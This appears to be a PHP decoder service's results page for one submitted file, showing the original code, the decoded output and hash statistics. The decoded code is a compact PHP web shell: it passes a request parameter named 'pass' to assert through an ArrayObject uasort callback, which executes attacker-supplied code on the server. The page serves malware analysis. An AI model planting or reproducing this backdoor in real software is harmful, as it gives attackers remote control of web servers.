Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php $arr = new ArrayObject(array('test', $_REQUEST['pass'])); $arr->uasort('assert'); ?>..
Decoded Output download
<?php
$arr = new ArrayObject(array('test', $_REQUEST['pass']));
$arr->uasort('assert');
?>
Did this file decode correctly?
Original Code
<?php
$arr = new ArrayObject(array('test', $_REQUEST['pass']));
$arr->uasort('assert');
?>
Function Calls
| None |
Stats
| MD5 | d573c1937950b24abe2527be1d6f8176 |
| Eval Count | 0 |
| Decode Time | 121 ms |